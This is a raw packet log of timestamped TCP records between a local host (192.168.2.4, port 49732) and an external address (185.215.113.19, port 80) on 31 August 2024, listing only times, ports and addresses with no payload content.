Aug 31, 2024 22:41:57.420649052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.420717001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.420747995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.420773029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.420799971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.420994997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421022892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421046019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421072960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421103954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421122074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421147108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421173096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421196938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421225071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421334982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421359062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421391964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421498060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421520948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421590090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421614885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421643019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421720982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421752930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421777964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.421811104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422024965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422044992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422074080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422102928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422127008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422151089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422174931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422202110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422302961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422331095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422358990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422435045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422462940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422558069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422585964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422657013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422681093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422704935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422732115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422900915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422924995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422950029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422974110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.422991991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423027039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423052073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423078060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423101902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423213959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423245907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423315048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423341990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423433065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423460007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423551083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423573017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423598051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423619986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423851013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423887014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423908949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423934937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423964024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.423988104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424010992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424035072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424058914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424086094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424226999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424249887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424427986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424452066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424524069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424550056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424571991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424755096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424783945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424809933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424833059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424858093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424882889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424906015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424930096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424953938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.424978971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425106049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425133944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425164938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425193071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425287962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425317049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425407887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425477028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425498962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425528049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425550938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425565958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.425576925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425616980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.425750017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.425771952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.425791025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425827026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425852060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425875902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425904036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425929070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425952911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.425976992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426003933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426100969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426130056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426160097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426228046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426253080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426317930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426346064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426373005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426441908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426464081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426491976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426517963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426680088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426709890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426737070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426763058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426789999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426815987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426841021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426862955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.426887035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427022934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427050114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427077055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427104950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427207947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427272081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427303076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427329063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427423000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427447081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427474022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427498102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427761078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427784920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427809954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427831888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427858114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427889109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.427915096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428039074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428039074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428062916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428163052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428232908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428258896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428287983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428358078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428378105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428406954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428431034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428622961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428652048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428678036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428699970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428724051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428750038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428774118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428800106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428925037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.428999901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429033995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429061890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429124117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429151058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429220915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429248095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429271936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429299116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429471970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429498911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429527044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429552078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429575920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429603100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429631948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429651022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429677010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429771900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429800034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429826021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429851055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429959059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.429986954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430008888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430099010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430124044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430149078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430243015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430265903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430299044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430350065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430373907 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430386066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430396080 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430407047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430418015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430428028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430438042 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430449009 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430459976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430469990 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430481911 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430493116 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430502892 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430514097 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430525064 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430536032 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430546999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430558920 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430569887 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430581093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430593014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430603981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430614948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430635929 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430649996 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430661917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430672884 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430672884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430682898 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430694103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430705070 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430715084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430726051 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430737019 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430747986 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430757999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430766106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.430768967 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430778980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430789948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430799961 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430810928 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430821896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430831909 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430843115 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430855036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430865049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430876017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430886984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430897951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430911064 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430923939 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430934906 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430946112 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430955887 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430967093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430977106 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430988073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.430999041 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431010008 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431020975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431030989 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431041956 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431051970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431062937 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431072950 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431083918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431093931 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431104898 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431114912 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431126118 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431137085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431148052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431158066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.431250095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431355000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431385040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431443930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431473017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431493998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431521893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431587934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431612015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431637049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431667089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431691885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431905031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431926966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431951046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.431977987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432003975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432030916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432056904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432080984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432107925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432214022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432240963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432266951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432336092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432377100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432396889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432465076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432497978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432559967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432585955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432609081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432640076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432662010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432687044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432713985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432735920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432898998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432924032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432945967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.432976007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433002949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433026075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433054924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433073997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433104992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433129072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433152914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433176994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.433279991 CEST	49732	80	192.168.2.4	185.215.113.19
